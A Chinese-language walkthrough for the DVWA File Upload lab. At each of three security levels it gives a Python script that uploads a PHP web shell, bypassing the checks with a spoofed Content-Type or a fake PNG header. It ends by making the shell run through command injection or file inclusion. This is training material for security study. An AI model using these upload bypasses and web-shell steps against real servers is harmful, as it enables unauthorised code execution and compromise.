low
low 等級的服務端基本不做任何檢查（不看後綴名、MIME 類型或檔案內容），直接以原始檔名上傳 .php shell 即可。
import requests
import re
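def main():
    """Upload ``wso.php`` to DVWA's File Upload module at security level "low".

    The low level performs no server-side validation, so the .php file is
    accepted with its real name and content type. The server's
    ``<pre>...</pre>`` status line (the upload path on success) is printed
    when present; otherwise the HTTP status is printed so a failure is not
    silent.
    """
    headers = {
        # Reuse an already-authenticated DVWA session; the ``security``
        # cookie is what selects the module's security level.
        'Cookie': 'PHPSESSID=jb7d875vs8rlusttoadfi1m4l5; security=low'
    }
    url = 'http://192.168.67.22/dvwa/vulnerabilities/upload/'
    data = {
        'Upload': 'Upload'
    }
    # Context manager closes the file after the request (the original
    # left the handle open).
    with open('wso.php', 'rb') as payload:
        files = [('uploaded', ('wso.php', payload, 'application/octet-stream'))]
        res = requests.post(url, data=data, files=files, headers=headers)
    # ``res.content`` is bytes; a str regex on it raises TypeError on
    # Python 3, so match against the decoded ``res.text`` instead.
    m = re.search(r'<pre>(.*?)</pre>', res.text, re.M | re.S)
    if m:
        print(m.group(1))
    else:
        print('no <pre> status message in response (HTTP %d)' % res.status_code)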
if __name__ == "__main__":  # run only when executed as a script, not on import
    main()
返回結果如下:
../../hackable/uploads/wso.php succesfully uploaded!
[Finished in 0.2s]
medium
查看源碼，可發現代碼只限制了 MIME 類型和文件大小。注意這裡的 MIME 類型（$uploaded_type）來自 $_FILES 中由客戶端請求自帶的 Content-Type，完全由上傳者控制，並不是服務端對檔案內容的判斷。
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && ( $uploaded_size < 100000 ) )
繞過思路：只需把 multipart 請求中該檔案部分的 Content-Type 改成 image/jpeg（或 image/png）即可，檔名仍然保留 .php，因為服務端既不檢查後綴名也不檢查檔案內容。
import requests
import re
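def main():
    """Upload ``wso.php`` to DVWA's File Upload module at security level "medium".

    The medium level only compares the client-supplied part Content-Type
    against ``image/jpeg`` / ``image/png`` and caps the size; neither the
    extension nor the file content is inspected, so lying about the
    Content-Type is enough and the file keeps its ``.php`` name. The
    server's ``<pre>...</pre>`` status line is printed when present;
    otherwise the HTTP status is printed so a failure is not silent.
    """
    headers = {
        # Reuse an already-authenticated DVWA session; the ``security``
        # cookie is what selects the module's security level.
        'Cookie': 'PHPSESSID=jb7d875vs8rlusttoadfi1m4l5; security=medium'
    }
    url = 'http://192.168.67.22/dvwa/vulnerabilities/upload/'
    data = {
        'Upload': 'Upload'
    }
    # Spoofed Content-Type is the whole bypass: the server trusts this
    # header as the file's MIME type. Context manager closes the handle
    # after the request (the original left it open).
    with open('wso.php', 'rb') as payload:
        files = [('uploaded', ('wso.php', payload, 'image/jpeg'))]
        res = requests.post(url, data=data, files=files, headers=headers)
    # ``res.content`` is bytes; a str regex on it raises TypeError on
    # Python 3, so match against the decoded ``res.text`` instead.
    m = re.search(r'<pre>(.*?)</pre>', res.text, re.M | re.S)
    if m:
        print(m.group(1))
    else:
        print('no <pre> status message in response (HTTP %d)' % res.status_code)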
if __name__ == "__main__":  # run only when executed as a script, not on import
    main()
high
查看源碼，可發現代碼限制了後綴名（不分大小寫，只允許 jpg/jpeg/png）和文件大小，並用 getimagesize() 檢查檔案是否為合法圖片；getimagesize() 只解析檔案開頭的圖片頭部資訊，不會檢查後面的內容。
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) && ( $uploaded_size < 100000 ) && getimagesize( $uploaded_tmp ) )
繞過思路:shell的後綴名改爲jpg/jpeg/png,文件頭插入jpg/png/gif的頭部信息繞過getimagesize,這裏我用png的頭部信息(前8個字節):
89 50 4E 47 0D 0A 1A 0A
注：這 8 個位元組必須以原始二進位形式寫入檔案最開頭（用二/十六進制編輯器操作），不能以文字形式輸入「89 50 4E 47 …」。
import requests
import re
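def main():
    """Upload a PNG-disguised PHP shell to DVWA's File Upload module at level "high".

    The high level whitelists the extension (jpg/jpeg/png), caps the size
    and calls ``getimagesize()`` on the upload. The local file ``dog.php``
    is expected to already start with the 8-byte PNG signature
    (89 50 4E 47 0D 0A 1A 0A) so the header check passes; it is sent under
    the name ``wso.png``. Because the stored name ends in ``.png`` the web
    server will not execute it as PHP on its own; a second weakness is
    needed to run or rename it. The server's ``<pre>...</pre>`` status
    line is printed when present; otherwise the HTTP status is printed so
    a failure is not silent.
    """
    headers = {
        # Reuse an already-authenticated DVWA session; the ``security``
        # cookie is what selects the module's security level.
        'Cookie': 'PHPSESSID=jb7d875vs8rlusttoadfi1m4l5; security=high'
    }
    url = 'http://192.168.67.22/dvwa/vulnerabilities/upload/'
    data = {
        'Upload': 'Upload'
    }
    # The part Content-Type is not checked at this level, only the
    # extension and the image header. Context manager closes the handle
    # after the request (the original left it open).
    with open('dog.php', 'rb') as payload:
        files = [('uploaded', ('wso.png', payload, 'application/octet-stream'))]
        res = requests.post(url, data=data, files=files, headers=headers)
    # ``res.content`` is bytes; a str regex on it raises TypeError on
    # Python 3, so match against the decoded ``res.text`` instead.
    m = re.search(r'<pre>(.*?)</pre>', res.text, re.M | re.S)
    if m:
        print(m.group(1))
    else:
        print('no <pre> status message in response (HTTP %d)' % res.status_code)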
if __name__ == "__main__":  # run only when executed as a script, not on import
    main()
文件上傳後，由於存檔名以 .png 結尾，Web 伺服器不會把它當作 PHP 執行，所以這裡借助前面的 command injection 漏洞，用 mv 命令把後綴改回 .php。【不依賴 command injection 的常見做法是利用 DVWA 的 File Inclusion 模組：include() 執行被包含檔案中的 PHP 代碼時並不看後綴，因此直接包含 hackable/uploads/wso.png 即可觸發其中的 shell（需在該模組可達的前提下自行驗證）。】